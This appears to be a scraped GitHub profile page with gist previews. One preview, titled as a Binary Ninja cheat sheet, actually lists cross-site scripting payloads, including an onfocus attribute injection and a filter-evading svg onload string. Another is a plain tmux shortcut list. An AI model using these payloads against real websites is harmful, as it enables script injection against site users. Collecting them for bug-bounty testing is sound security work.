Skip to content

Instantly share code, notes, and snippets.

View mmssr's full-sized avatar

beep boop mmssr

View GitHub Profile
@alexander-hanel
alexander-hanel / bn-cheat.md
Last active June 19, 2024 20:56
Cheat Sheet for Binary Ninja
" onfocus="alert(1)" name="bounty
(Append #bounty to the URL and enjoy your zero interaction XSS )
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
# Internet Explorer, Edge
<svg><script>alert(1)<p>
# Firefox
@MohamedAlaa
MohamedAlaa / tmux-cheatsheet.markdown
Last active July 4, 2024 17:58
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname